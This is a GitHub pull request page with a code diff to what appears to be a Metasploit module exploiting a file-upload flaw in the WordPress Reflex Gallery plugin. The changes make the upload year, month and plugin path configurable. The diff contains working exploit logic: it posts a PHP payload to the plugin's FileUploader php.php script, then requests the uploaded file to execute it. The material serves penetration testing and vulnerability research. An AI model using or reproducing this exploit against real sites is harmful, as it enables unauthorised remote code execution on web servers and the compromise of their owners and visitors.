Skip to content

Remove current date constraint from uploaded path in wp_reflexgallery_file_upload #20744

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
ptrstr wants to merge 3 commits into
base: master
Choose a base branch
from
Open

Remove current date constraint from uploaded path in wp_reflexgallery_file_upload #20744

Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
7871063
Remove current date constraint from uploaded path
ptrstr Dec 3, 2025
7b816cd
Add year and month options for file upload
ptrstr Dec 4, 2025
30635cb
Make plugin URI configurable
ptrstr Dec 10, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
28 changes: 23 additions & 5 deletions modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -42,6 +42,23 @@ def initialize(info = {})
}
)
)

time = Time.new
register_options(
[
OptString.new('UPLOAD_YEAR', [ false, 'Year to use in upload path', time.year.to_s]),
OptString.new('UPLOAD_MONTH', [ false, 'Month to use in upload path', "%02d" % time.month]),
OptString.new('PLUGIN_DIRECTORY_NAME', [ true, 'Name of the directory that contains the reflex-gallery plugin', 'reflex-gallery']),
]
)
end

def plugin_dir
datastore['PLUGIN_DIRECTORY_NAME']
end

def plugin_uri
normalize_uri(wordpress_url_plugins, plugin_dir)
end

def check
Expand All @@ -55,12 +72,11 @@ def exploit
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
post_data = data.to_s

time = Time.new
year = time.year.to_s
month = "%02d" % time.month
year = datastore['upload_year']
month = datastore['upload_month']

res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
'uri' => normalize_uri(plugin_uri, 'admin', 'scripts', 'FileUploader', 'php.php'),
'method' => 'POST',
'vars_get' => {
'Year' => "#{year}",
Expand All @@ -74,6 +90,8 @@ def exploit
if res.code == 200 && res.body =~ /success|#{php_pagename}/
print_good("Our payload is at: #{php_pagename}. Calling payload...")
register_files_for_cleanup(php_pagename)
elsif res.code == 200 && res.body.include?("does not exist")
fail_with(Failure::Unknown, "#{peer} - Upload directory /#{year}/#{month} does not exist. Try setting them to an existing upload folder or emptying the variables to upload to the root upload folder")
else
fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
Expand All @@ -83,7 +101,7 @@ def exploit

print_status("Calling payload...")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename)
'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', year, month, php_pagename)
)
end
end